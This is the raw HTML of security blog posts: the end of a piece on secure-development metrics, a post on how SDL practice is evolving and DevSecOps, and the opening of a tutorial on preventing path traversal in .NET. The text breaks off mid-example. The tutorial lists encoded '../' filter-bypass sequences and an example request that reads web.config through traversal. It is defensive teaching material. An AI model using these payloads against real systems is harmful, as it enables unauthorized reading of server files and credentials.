href="https://www.theverge.com/2019/3/25/18280716/asus-update-tool-hacked-shadowhammer-malware" rel="nofollow noopener" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0.54); background-color: transparent; background-image: url("data:image/svg+xml; background-position: 0px calc(1em + 1px); background-repeat: repeat-x; background-size: 1px 1px; http: //www.w3.org/2000/svg\"><line x1=\"0\" y1=\"0\" x2=\"1\" y2=\"1\" stroke=\"currentColor\" /></svg>"); text-decoration-line: none;" target="_blank">software update security</a> incidents are just a few examples of polluting the supply chain.</div>
<div class="graf graf--p graf-after--p" id="97d3" name="97d3" style="--baseline-multiplier: 0.17; --x-height-multiplier: 0.375; background-color: white; color: rgba(0, 0, 0, 0.84); font-family: medium-content-serif-font, Georgia, Cambria, "Times New Roman", Times, serif; font-size: 21px; letter-spacing: -0.003em; line-height: 1.58; margin-top: 29px;">
<span class="markup--strong markup--p-strong" style="font-weight: 700;">Metrics transformation; lead vs lag indicators</span></div>
<div class="graf graf--p graf-after--p" id="e116" name="e116" style="--baseline-multiplier: 0.17; --x-height-multiplier: 0.375; background-color: white; color: rgba(0, 0, 0, 0.84); font-family: medium-content-serif-font, Georgia, Cambria, "Times New Roman", Times, serif; font-size: 21px; letter-spacing: -0.003em; line-height: 1.58; margin-top: 29px;">
Take this example of metrics</div>
<blockquote class="graf graf--blockquote graf--startsWithDoubleQuote graf-after--p" id="8656" name="8656" style="--baseline-multiplier: 0.17; --x-height-multiplier: 0.375; background-color: white; border-left: 3px solid rgba(0, 0, 0, 0.84); color: rgba(0, 0, 0, 0.84); font-family: medium-content-serif-font, Georgia, Cambria, "Times New Roman", Times, serif; font-size: 21px; font-style: italic; letter-spacing: -0.003em; line-height: 1.58; margin: 29px 0px 0px -23px; padding-bottom: 2px; padding-left: 20px;">
<span class="markup--em markup--blockquote-em" style="font-feature-settings: "liga", "salt"; font-style: normal;">“the percentage of people wearing hard hats on a building site is a </span><span class="markup--strong markup--blockquote-strong" style="font-weight: 700;"><span class="markup--em markup--blockquote-em" style="font-feature-settings: "liga", "salt"; font-style: normal;">leading safety indicator</span></span><span class="markup--em markup--blockquote-em" style="font-feature-settings: "liga", "salt"; font-style: normal;">. A lagging indicator is an output measurement, for example; the</span><span class="markup--strong markup--blockquote-strong" style="font-weight: 700;"><span class="markup--em markup--blockquote-em" style="font-feature-settings: "liga", "salt"; font-style: normal;"> number of accidents</span></span><span class="markup--em markup--blockquote-em" style="font-feature-settings: "liga", "salt"; font-style: normal;"> on a building site is a lagging safety indicator.”</span></blockquote>
<blockquote class="graf graf--blockquote graf-after--blockquote" id="6b64" name="6b64" style="--baseline-multiplier: 0.17; --x-height-multiplier: 0.375; background-color: white; border-left: 3px solid rgba(0, 0, 0, 0.84); color: rgba(0, 0, 0, 0.84); font-family: medium-content-serif-font, Georgia, Cambria, "Times New Roman", Times, serif; font-size: 21px; font-style: italic; letter-spacing: -0.003em; line-height: 1.58; margin: 0px 0px 0px -23px; padding-bottom: 2px; padding-left: 20px; padding-top: 27px;">
From: <a class="markup--anchor markup--blockquote-anchor" data-href="https://www.intrafocus.com/lead-and-lag-indicators/" href="https://www.intrafocus.com/lead-and-lag-indicators/" rel="nofollow noopener" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0.54); background-color: transparent; background-image: url("data:image/svg+xml; background-position: 0px calc(1em + 1px); background-repeat: repeat-x; background-size: 1px 1px; http: //www.w3.org/2000/svg\"><line x1=\"0\" y1=\"0\" x2=\"1\" y2=\"1\" stroke=\"currentColor\" /></svg>"); text-decoration-line: none;" target="_blank">https://www.intrafocus.com/lead-and-lag-indicators/</a></blockquote>
<div class="graf graf--p graf-after--blockquote" id="3137" name="3137" style="--baseline-multiplier: 0.17; --x-height-multiplier: 0.375; background-color: white; color: rgba(0, 0, 0, 0.84); font-family: medium-content-serif-font, Georgia, Cambria, "Times New Roman", Times, serif; font-size: 21px; letter-spacing: -0.003em; line-height: 1.58; margin-top: 29px;">
As the security development practices evolve, the same should happens to related metrics. Formal compliance frameworks and lack of severe incidents may have been enough in the past, but neither happens before software development itself. On the other hand, leading indicators are measured <span class="markup--strong markup--p-strong" style="font-weight: 700;">during the SDL</span>; leading efforts could be measured in both resources expenditures and assessing maturity level, better both.</div>
<div class="graf graf--p graf-after--p" id="0790" name="0790" style="--baseline-multiplier: 0.17; --x-height-multiplier: 0.375; background-color: white; color: rgba(0, 0, 0, 0.84); font-family: medium-content-serif-font, Georgia, Cambria, "Times New Roman", Times, serif; font-size: 21px; letter-spacing: -0.003em; line-height: 1.58; margin-top: 29px;">
After all, would you trust a nuclear power plant just because is law compliant and had no incidents in the last 10 years even IF they don’t spend a buck in security? Let’s put it this way: consider that our planes and power plants use a lot of software, as well as our future medical operation machine, human and self driving cars etc… and I want to see organizations passionately investing in security, in the smartest, and more efficient way, please!</div>
<div class="graf graf--p graf-after--p graf--trailing" id="af0e" name="af0e" style="--baseline-multiplier: 0.17; --x-height-multiplier: 0.375; background-color: white; color: rgba(0, 0, 0, 0.84); font-family: medium-content-serif-font, Georgia, Cambria, "Times New Roman", Times, serif; font-size: 21px; letter-spacing: -0.003em; line-height: 1.58; margin-top: 29px;">
In the next part(s) I want to dig deeper into the evolution of SDL practices in the cyber security market.</div>
Anonymousnoreply@blogger.com0tag:blogger.com,1999:blog-7122745763234660283.post-48461242952503053272019-04-11T01:49:00.000-07:002019-05-18T03:16:10.108-07:00Secure Development Lifecycle: the SDL value evolution. Part 2<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="graf graf--p graf-after--h3" id="a870" name="a870" style="--baseline-multiplier: 0.17; --x-height-multiplier: 0.375; background-color: white; color: rgba(0, 0, 0, 0.84); font-family: medium-content-serif-font, Georgia, Cambria, "Times New Roman", Times, serif; font-size: 21px; letter-spacing: -0.003em; line-height: 1.58; margin-top: 8px;">
<span class="markup--strong markup--p-strong" style="font-weight: 700;">Evolution of SDL practices: from custom to product to service</span></div>
<div class="graf graf--p graf-after--p" id="ad9b" name="ad9b" style="--baseline-multiplier: 0.17; --x-height-multiplier: 0.375; background-color: white; color: rgba(0, 0, 0, 0.84); font-family: medium-content-serif-font, Georgia, Cambria, "Times New Roman", Times, serif; font-size: 21px; letter-spacing: -0.003em; line-height: 1.58; margin-top: 29px;">
The increasing visibility trend discussed in Part 1, of course, is impacting the current cybersecurity practices, in terms of maturity of evolution, also toward a “service”.</div>
<blockquote class="graf graf--blockquote graf-after--p" id="fc09" name="fc09" style="--baseline-multiplier: 0.17; --x-height-multiplier: 0.375; background-color: white; border-left: 3px solid rgba(0, 0, 0, 0.84); color: rgba(0, 0, 0, 0.84); font-family: medium-content-serif-font, Georgia, Cambria, "Times New Roman", Times, serif; font-size: 21px; font-style: italic; letter-spacing: -0.003em; line-height: 1.58; margin: 29px 0px 0px -23px; padding-bottom: 2px; padding-left: 20px;">
<a class="markup--anchor markup--blockquote-anchor" data-href="https://medium.com/wardleymaps/exploring-the-map-ad0266fad59b" href="https://medium.com/wardleymaps/exploring-the-map-ad0266fad59b" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0.54); background-color: transparent; background-image: url("data:image/svg+xml; background-position: 0px calc(1em + 1px); background-repeat: repeat-x; background-size: 1px 1px; http: //www.w3.org/2000/svg\"><line x1=\"0\" y1=\"0\" x2=\"1\" y2=\"1\" stroke=\"currentColor\" /></svg>"); text-decoration-line: none;" target="_blank">Organisations consist of value chains that are comprised of components that are evolving from genesis to more of a commodity. It sounds fairly basic stuff but it has profound effects because that journey of evolution involves changing characteristics.</a></blockquote>
<div class="graf graf--p graf-after--blockquote" id="2efb" name="2efb" style="--baseline-multiplier: 0.17; --x-height-multiplier: 0.375; background-color: white; color: rgba(0, 0, 0, 0.84); font-family: medium-content-serif-font, Georgia, Cambria, "Times New Roman", Times, serif; font-size: 21px; letter-spacing: -0.003em; line-height: 1.58; margin-top: 29px;">
Following is a <a class="markup--anchor markup--p-anchor" data-href="https://medium.com/@swardley" href="https://medium.com/@swardley" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0.54); background-color: transparent; background-image: url("data:image/svg+xml; background-position: 0px calc(1em + 1px); background-repeat: repeat-x; background-size: 1px 1px; http: //www.w3.org/2000/svg\"><line x1=\"0\" y1=\"0\" x2=\"1\" y2=\"1\" stroke=\"currentColor\" /></svg>"); text-decoration-line: none;" target="_blank">Wardley Map </a>(product evolution/visibility graph) comparing Penetration Testing (PT, more a reacting activity) and SDL (preventing vulnerabilities):</div>
<br />
<br />
<figure class="graf graf--figure graf-after--p" id="72cb" name="72cb" style="background-color: white; box-sizing: border-box; clear: both; color: rgba(0, 0, 0, 0.84); font-family: medium-content-sans-serif-font, -apple-system, system-ui, "Segoe UI", Roboto, Oxygen, Ubuntu, Cantarell, "Open Sans", "Helvetica Neue", sans-serif; font-size: 20px; margin: 43px 0px 0px; outline: 0px; position: relative; user-select: auto; z-index: 100;"><div class="aspectRatioPlaceholder is-locked" style="margin: 0px auto; max-height: 455px; max-width: 700px; position: relative; width: 700px;">
<div class="aspectRatioPlaceholder-fill" style="padding-bottom: 455.688px;">
</div>
<div class="progressiveMedia js-progressiveMedia graf-image is-canvasLoaded is-imageLoaded" data-action-value="0*GIFW1hlDfbuTItl2" data-action="zoom" data-height="594" data-image-id="0*GIFW1hlDfbuTItl2" data-is-featured="true" data-scroll="native" data-width="913" style="background: rgba(0, 0, 0, 0); box-sizing: border-box; cursor: zoom-in; height: 455px; left: 0px; margin: auto; max-width: 100%; position: absolute; top: 0px; transition: background 0.2s ease 0s; width: 700px;">
<canvas class="progressiveMedia-canvas js-progressiveMedia-canvas" height="48" style="backface-visibility: hidden; box-sizing: border-box; display: block; height: 455px; left: 0px; margin: auto; opacity: 0; position: absolute; top: 0px; transition: visibility 0s linear 0.5s, opacity 0.1s ease 0.4s; vertical-align: baseline; visibility: hidden; width: 700px;" width="75"></canvas><img class="progressiveMedia-image js-progressiveMedia-image" data-src="https://cdn-images-1.medium.com/max/1600/0*GIFW1hlDfbuTItl2" src="https://cdn-images-1.medium.com/max/1600/0*GIFW1hlDfbuTItl2" style="backface-visibility: hidden; border: 0px; box-sizing: border-box; display: block; height: 455px; left: 0px; margin: auto; opacity: 1; position: absolute; top: 0px; transition: visibility 0s linear 0s, opacity 0.4s ease 0s; visibility: visible; width: 700px; z-index: 100;" /></div>
</div>
</figure><br />
<div class="graf graf--p graf-after--figure" id="85a1" name="85a1" style="--baseline-multiplier: 0.17; --x-height-multiplier: 0.375; background-color: white; color: rgba(0, 0, 0, 0.84); font-family: medium-content-serif-font, Georgia, Cambria, "Times New Roman", Times, serif; font-size: 21px; letter-spacing: -0.003em; line-height: 1.58; margin-top: 38px;">
The previous example is a comparison over time (name it: 10 years) of one of the most common practice in cybersecurity. Penetration Testing (PT) went form a custom made exercise, to a product and shifting to a commodity (as a service PT, crow found style bug bounty, etc…) whether the ‘Prevent’ activity: SDL, is gaining the shape of a product and finally more visibility that, by the way, means money.</div>
<div class="graf graf--p graf-after--p" id="d823" name="d823" style="--baseline-multiplier: 0.17; --x-height-multiplier: 0.375; background-color: white; color: rgba(0, 0, 0, 0.84); font-family: medium-content-serif-font, Georgia, Cambria, "Times New Roman", Times, serif; font-size: 21px; letter-spacing: -0.003em; line-height: 1.58; margin-top: 29px;">
<span class="markup--strong markup--p-strong" style="font-weight: 700;">Pushing security left in the lifecycle, but also pushing up in visibility</span></div>
<br />
<br />
<figure class="graf graf--figure graf-after--p" id="47ae" name="47ae" style="background-color: white; box-sizing: border-box; clear: both; color: rgba(0, 0, 0, 0.84); font-family: medium-content-sans-serif-font, -apple-system, system-ui, "Segoe UI", Roboto, Oxygen, Ubuntu, Cantarell, "Open Sans", "Helvetica Neue", sans-serif; font-size: 20px; margin: 43px 0px 0px; outline: 0px; position: relative; user-select: auto; z-index: 100;"><div class="aspectRatioPlaceholder is-locked" style="margin: 0px auto; max-height: 136px; max-width: 700px; position: relative; width: 700px;">
<div class="aspectRatioPlaceholder-fill" style="padding-bottom: 135.797px;">
</div>
<div class="progressiveMedia js-progressiveMedia graf-image is-canvasLoaded is-imageLoaded" data-action-value="1*lapqUFdkczOjDBZpOm36sQ.png" data-action="zoom" data-height="202" data-image-id="1*lapqUFdkczOjDBZpOm36sQ.png" data-scroll="native" data-width="1039" style="background: rgba(0, 0, 0, 0); box-sizing: border-box; cursor: zoom-in; height: 135.797px; left: 0px; margin: auto; max-width: 100%; position: absolute; top: 0px; transition: background 0.2s ease 0s; width: 700px;">
<canvas class="progressiveMedia-canvas js-progressiveMedia-canvas" height="13" style="backface-visibility: hidden; box-sizing: border-box; display: block; height: 135.797px; left: 0px; margin: auto; opacity: 0; position: absolute; top: 0px; transition: visibility 0s linear 0.5s, opacity 0.1s ease 0.4s; vertical-align: baseline; visibility: hidden; width: 700px;" width="75"></canvas><img class="progressiveMedia-image js-progressiveMedia-image" data-src="https://cdn-images-1.medium.com/max/1600/1*lapqUFdkczOjDBZpOm36sQ.png" src="https://cdn-images-1.medium.com/max/1600/1*lapqUFdkczOjDBZpOm36sQ.png" style="backface-visibility: hidden; border: 0px; box-sizing: border-box; display: block; height: 135.797px; left: 0px; margin: auto; opacity: 1; position: absolute; top: 0px; transition: visibility 0s linear 0s, opacity 0.4s ease 0s; visibility: visible; width: 700px; z-index: 100;" /></div>
</div>
<figcaption class="imageCaption" style="--baseline-multiplier: 0.22; --x-height-multiplier: 0.342; color: rgba(0, 0, 0, 0.68); font-family: medium-content-sans-serif-font, "Lucida Grande", "Lucida Sans Unicode", "Lucida Sans", Geneva, Arial, sans-serif; font-feature-settings: "liga", "lnum"; font-size: 16px; left: 0px; letter-spacing: 0px; line-height: 1.4; margin-top: 10px; outline: 0px; position: relative; text-align: center; top: 0px; width: 700px; z-index: 300;">from: <a class="markup--anchor markup--figure-anchor" data-href="https://code.likeagirl.io/pushing-left-like-a-boss-part-1-80f1f007da95" href="https://code.likeagirl.io/pushing-left-like-a-boss-part-1-80f1f007da95" rel="nofollow noopener" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0.54); background-color: transparent; background-image: url("data:image/svg+xml; background-position: 0px calc(1em + 1px); background-repeat: repeat-x; background-size: 1px 1px; http: //www.w3.org/2000/svg\"><line x1=\"0\" y1=\"0\" x2=\"1\" y2=\"1\" stroke=\"currentColor\" /></svg>"); text-decoration-line: none;" target="_blank">https://code.likeagirl.io/pushing-left-like-a-boss-part-1-80f1f007da95</a></figcaption></figure><br />
<div class="graf graf--p graf-after--figure" id="6d40" name="6d40" style="--baseline-multiplier: 0.17; --x-height-multiplier: 0.375; background-color: white; color: rgba(0, 0, 0, 0.84); font-family: medium-content-serif-font, Georgia, Cambria, "Times New Roman", Times, serif; font-size: 21px; letter-spacing: -0.003em; line-height: 1.58; margin-top: 38px;">
<a class="markup--anchor markup--p-anchor" data-href="https://code.likeagirl.io/pushing-left-like-a-boss-part-1-80f1f007da95" href="https://code.likeagirl.io/pushing-left-like-a-boss-part-1-80f1f007da95" rel="nofollow noopener" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0.54); background-color: transparent; background-image: url("data:image/svg+xml; background-position: 0px calc(1em + 1px); background-repeat: repeat-x; background-size: 1px 1px; http: //www.w3.org/2000/svg\"><line x1=\"0\" y1=\"0\" x2=\"1\" y2=\"1\" stroke=\"currentColor\" /></svg>"); text-decoration-line: none;" target="_blank">Pushing left like a Boss</a> series explains it very well: how to prevent better, but the map of the evolution of the SDL shows also the point discussed in Part 1 of the article: the visibility value on having an SDL.</div>
<div class="graf graf--p graf-after--p" id="a1b3" name="a1b3" style="--baseline-multiplier: 0.17; --x-height-multiplier: 0.375; background-color: white; color: rgba(0, 0, 0, 0.84); font-family: medium-content-serif-font, Georgia, Cambria, "Times New Roman", Times, serif; font-size: 21px; letter-spacing: -0.003em; line-height: 1.58; margin-top: 29px;">
The birth of a new language is the result (for some the cause) of this “pushing left”. DevSecOps is nowadays term to express this fact. “Threat Model” is another term gaining traction.</div>
<div class="graf graf--p graf-after--p" id="783d" name="783d" style="--baseline-multiplier: 0.17; --x-height-multiplier: 0.375; background-color: white; color: rgba(0, 0, 0, 0.84); font-family: medium-content-serif-font, Georgia, Cambria, "Times New Roman", Times, serif; font-size: 21px; letter-spacing: -0.003em; line-height: 1.58; margin-top: 29px;">
DevSecOps imply that the “security guys” will be working together with the developers and also that the developer will be more involved in the security practices. I think this is a real advancement in the SDL field, of course, vendors will overload this term with fancy product associations, that is always expected…we know that Dev*Ops is more a principle/value more than a bunch of products.</div>
<div class="graf graf--p graf-after--p" id="8d66" name="8d66" style="--baseline-multiplier: 0.17; --x-height-multiplier: 0.375; background-color: white; color: rgba(0, 0, 0, 0.84); font-family: medium-content-serif-font, Georgia, Cambria, "Times New Roman", Times, serif; font-size: 21px; letter-spacing: -0.003em; line-height: 1.58; margin-top: 29px;">
On the contrary, PenTest (black box testing, often disconnected to the SDL, non automated, single points in time activity <a class="markup--anchor markup--p-anchor" data-href="https://www.owasp.org/images/a/a6/MWR_-_OWASP_v6.pdf" href="https://www.owasp.org/images/a/a6/MWR_-_OWASP_v6.pdf" rel="nofollow noopener" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0.54); background-color: transparent; background-image: url("data:image/svg+xml; background-position: 0px calc(1em + 1px); background-repeat: repeat-x; background-size: 1px 1px; http: //www.w3.org/2000/svg\"><line x1=\"0\" y1=\"0\" x2=\"1\" y2=\"1\" stroke=\"currentColor\" /></svg>"); text-decoration-line: none;" target="_blank">link</a>) will have hard times in the near future in an educated SDL environment. Will rules-based compliance follow this trend soon? Don’t know this answer. But if you think you need PenTest…most likely you need even more to mature you SDL!</div>
<div class="graf graf--p graf-after--p" id="6e1f" name="6e1f" style="--baseline-multiplier: 0.17; --x-height-multiplier: 0.375; background-color: white; color: rgba(0, 0, 0, 0.84); font-family: medium-content-serif-font, Georgia, Cambria, "Times New Roman", Times, serif; font-size: 21px; letter-spacing: -0.003em; line-height: 1.58; margin-top: 29px;">
<span class="markup--strong markup--p-strong" style="font-weight: 700;">Security says yes!</span></div>
<div class="graf graf--p graf-after--p graf--trailing" id="88ca" name="88ca" style="--baseline-multiplier: 0.17; --x-height-multiplier: 0.375; background-color: white; color: rgba(0, 0, 0, 0.84); font-family: medium-content-serif-font, Georgia, Cambria, "Times New Roman", Times, serif; font-size: 21px; letter-spacing: -0.003em; line-height: 1.58; margin-top: 29px;">
DevSecOps values push toward software evolution (CD: continuous delivery of new features), automation and quality (continuous integration). It is a fertile ground for increasing the maturity of the SDL. Investing in SDL means also more functional products in the short/medium term too, not only more secure and less risky. Of course, the challenge is to transform a legacy product/team to this more integrated approach. Intrinsic problems like lack of specific expertise in the market are still plaguing the cybersecurity and SLD sector. It is also something that cannot be implemented in “few weeks”. Defining a custom plan, called also programme or roadmap, based on maturity models like OWASP <a class="markup--anchor markup--p-anchor" data-href="https://github.com/OWASP/samm/raw/master/Supporting%20Resources/v1.5/Final/SAMM_Quick_Start_V1-5_FINAL.pdf" href="https://github.com/OWASP/samm/raw/master/Supporting%20Resources/v1.5/Final/SAMM_Quick_Start_V1-5_FINAL.pdf" rel="nofollow noopener" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0.54); background-color: transparent; background-image: url("data:image/svg+xml; background-position: 0px calc(1em + 1px); background-repeat: repeat-x; background-size: 1px 1px; http: //www.w3.org/2000/svg\"><line x1=\"0\" y1=\"0\" x2=\"1\" y2=\"1\" stroke=\"currentColor\" /></svg>"); text-decoration-line: none;" target="_blank">SAMM</a> and <a class="markup--anchor markup--p-anchor" data-href="https://www.owasp.org/index.php/OWASP_Software_Security_5D_Framework" href="https://www.owasp.org/index.php/OWASP_Software_Security_5D_Framework" rel="nofollow noopener" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0.54); background-color: transparent; background-image: url("data:image/svg+xml; background-position: 0px calc(1em + 1px); background-repeat: repeat-x; background-size: 1px 1px; http: //www.w3.org/2000/svg\"><line x1=\"0\" y1=\"0\" x2=\"1\" y2=\"1\" stroke=\"currentColor\" /></svg>"); text-decoration-line: none;" target="_blank">OWASP 5D</a>, made up of incremental enhancement over time have been successful in several organizations. It may take years but there are not many shortcuts.</div>
</div>
Anonymousnoreply@blogger.com0tag:blogger.com,1999:blog-7122745763234660283.post-72855527345628137712018-10-23T02:18:00.000-07:002019-12-06T07:19:33.328-08:00How to prevent Path Traversal in .NET<h3>
Introduction</h3>
<div>
<div style="text-align: justify;">
A well-known, never out of fashion and highly impact vulnerability
is the Path Traversal. This technique is also known as <i>dot-dot-slash attack</i> (../) or as a <i>directory traversal</i>, and it consists in exploiting an insufficient security validation/sanitization of user input, which is used by the application to build pathnames to retrieve files or directories from the file system, by manipulating the values through special characters that allow access to parent files.<br />
In Open Web Application Security Project (OWASP) terms, a path traversal attack falls under the category <a href="https://www.owasp.org/index.php/Top_10-2017_A5-Broken_Access_Control">A5 of the top 10 (2017)</a>: Broken Access Control, so as one of top 10 issues of 2017 we should give it a special attention.<br />
<br /></div>
</div>
<h3>
Theoretical Concept</h3>
<div>
<div>
<div style="text-align: justify;">
Most basic Path Traversal attacks can be made through the use of "../" characters sequence to alter the resource location requested from a URL. Although many web servers protect applications against escaping from the web root, different encodings of "../" sequence can be successfully used to bypass these security filters and to exploit through flawed canonicalization operations and normalization process. </div>
<div style="text-align: justify;">
<br /></div>
</div>
<div>
<b>URL Encode :</b></div>
<ul>
<li><span style="background: #eee; border: 0px; box-sizing: border-box; color: #696666; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">%2e%2e%2f</span> which translates to <span style="background: #eee; border: 0px; box-sizing: border-box; color: #696666; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">../</span></li>
<li><span style="background: #eee; border: 0px; box-sizing: border-box; color: #696666; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">%2e%2e/</span> which translates to <span style="background: #eee; border: 0px; box-sizing: border-box; color: #696666; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">../</span></li>
<li><span style="background: #eee; border: 0px; box-sizing: border-box; color: #696666; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">..%2f</span> which translates to <span style="background: #eee; border: 0px; box-sizing: border-box; color: #696666; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">../</span></li>
<li><span style="background: #eee; border: 0px; box-sizing: border-box; color: #696666; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">%2e%2e%5c</span> which translates to <span style="background: #eee; border: 0px; box-sizing: border-box; color: #696666; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">..\</span></li>
<li><span style="background: #eee; border: 0px; box-sizing: border-box; color: #696666; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">..%255c</span> which translates to <span style="background: #eee; border: 0px; box-sizing: border-box; color: #696666; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">..\</span></li>
<li><span style="background: #eee; border: 0px; box-sizing: border-box; color: #696666; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">..%u2216</span> which translates to <span style="background: #eee; border: 0px; box-sizing: border-box; color: #696666; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">..\</span></li>
</ul>
<div>
<b>Valid Unicode / UTF-8 Encodings :</b></div>
<div>
<ul>
<li><span style="background: rgb(238 , 238 , 238); border: 0px; box-sizing: border-box; color: #696666; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">%cc%b7</span> translates to <span style="background: rgb(238 , 238 , 238); border: 0px; box-sizing: border-box; color: #696666; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> ? </span> (NON-SPACING SHORT SLASH OVERLAY )</li>
<li><span style="background: rgb(238 , 238 , 238); border: 0px; box-sizing: border-box; color: #696666; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">%cc%b8</span> translates to <span style="color: #696666;"><span style="background-color: #eeeeee;"> ? </span></span> (NON-SPACING LONG SLASH OVERLAY )</li>
<li><span style="background: rgb(238 , 238 , 238); border: 0px; box-sizing: border-box; color: #696666; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">%e2%81%84</span> translates to <span style="background: rgb(238 , 238 , 238); border: 0px; box-sizing: border-box; color: #696666; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> ? </span> (FRACTION SLASH)</li>
<li><span style="background: rgb(238 , 238 , 238); border: 0px; box-sizing: border-box; color: #696666; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">%e2%88%95</span> translates to <span style="background: rgb(238 , 238 , 238); border: 0px; box-sizing: border-box; color: #696666; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> ? </span> (DIVISION SLASH) </li>
<li><span style="background: rgb(238 , 238 , 238); border: 0px; box-sizing: border-box; color: #696666; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">%ef%bc%8f</span> translates to <span style="background: rgb(238 , 238 , 238); border: 0px; box-sizing: border-box; color: #696666; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">? </span> (FULLWIDTH SLASH)</li>
</ul>
</div>
</div>
<div>
<b>Invalid Unicode / UTF-8 Encodings :</b></div>
<div>
<ul>
<li><span style="background: rgb(238 , 238 , 238); border: 0px; box-sizing: border-box; color: #696666; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">%c1%1c</span> translates to <span style="background: rgb(238 , 238 , 238); border: 0px; box-sizing: border-box; color: #696666; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">/</span></li>
<li><span style="background: rgb(238 , 238 , 238); border: 0px; box-sizing: border-box; color: #696666; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">%c0%af</span> translates to <span style="background: rgb(238 , 238 , 238); border: 0px; box-sizing: border-box; color: #696666; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">\</span></li>
</ul>
</div>
<h3>
Practical Attack</h3>
<div>
<div style="text-align: justify;">
Shall we see two attacks example, the first one exploits through an incorrect validation and sanitization of input data which are modified to access not expected resources; the second one exploits through a well-known vulnerability of some unzip libraries which doesn't use secure by default logic, allowing (via symlink) to unzip files in parent directory.</div>
</div>
<div>
<br /></div>
<b>Path Traversal</b><br />
As we saw in a previous post <a href="https://blog.mindedsecurity.com/2018/10/from-path-traversal-to-source-code-in.html">From Path Traversal to Source Code in Asp.NET MVC Applications</a>, a Path Traversal can lead to catastrophic consequences and that is why we consider this vulnerability as a Medium/High impact.<br />
A request like this: <br />
<div>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<div style="background: rgb(255, 255, 255); border: 0px; box-sizing: border-box; color: #555555; font-family: Lato, sans-serif; font-size: 14px; margin: 0px; outline: 0px; padding: 0px; text-align: left; vertical-align: baseline;">
<div style="background: transparent; border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;">
Request:</div>
</div>
<div style="background: rgb(255, 255, 255); border: 0px; box-sizing: border-box; color: #555555; font-family: Lato, sans-serif; font-size: 14px; margin: 0px; outline: 0px; padding: 0px; text-align: left; vertical-align: baseline;">
<span style="background: transparent; border: 0px; box-sizing: border-box; font-family: "courier new" , "courier" , monospace; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><span style="background: rgb(249, 242, 244); border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><span style="background: transparent; border: 0px; box-sizing: border-box; color: #c7254e; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">GET /download_page?id=<b>content.dat</b> HTTP/1.1</span></span></span><br />
<span style="background: transparent; border: 0px; box-sizing: border-box; font-family: "courier new" , "courier" , monospace; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Host: example-mvc-application.minded</span><br />
<span style="background: transparent; border: 0px; box-sizing: border-box; font-family: "courier new" , "courier" , monospace; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">[...]</span></div>
</div>
</div>
<div>
<span id="docs-internal-guid-01c57c20-7fff-a1cd-f582-7a9e0589a892"></span><br />
<div>
<span id="docs-internal-guid-01c57c20-7fff-a1cd-f582-7a9e0589a892">Can be tampered and exploited using ../ path sequence, and get access to configuration file.</span><br />
<br /></div>
</div>
<div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<div style="background: rgb(255, 255, 255); border: 0px; box-sizing: border-box; color: #555555; font-family: Lato, sans-serif; font-size: 14px; margin: 0px; outline: 0px; padding: 0px; text-align: left; vertical-align: baseline;">
<div style="background: transparent; border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;">
Request:</div>
</div>
<div style="background: rgb(255, 255, 255); border: 0px; box-sizing: border-box; color: #555555; font-family: Lato, sans-serif; font-size: 14px; margin: 0px; outline: 0px; padding: 0px; text-align: left; vertical-align: baseline;">
<span style="background: transparent; border: 0px; box-sizing: border-box; font-family: "courier new" , "courier" , monospace; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><span style="background: rgb(249, 242, 244); border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><span style="background: transparent; border: 0px; box-sizing: border-box; color: #c7254e; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">GET /download_page?id=<b style="background: transparent; border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">..%2f..%2fweb.config</b> HTTP/1.1</span></span></span><br />
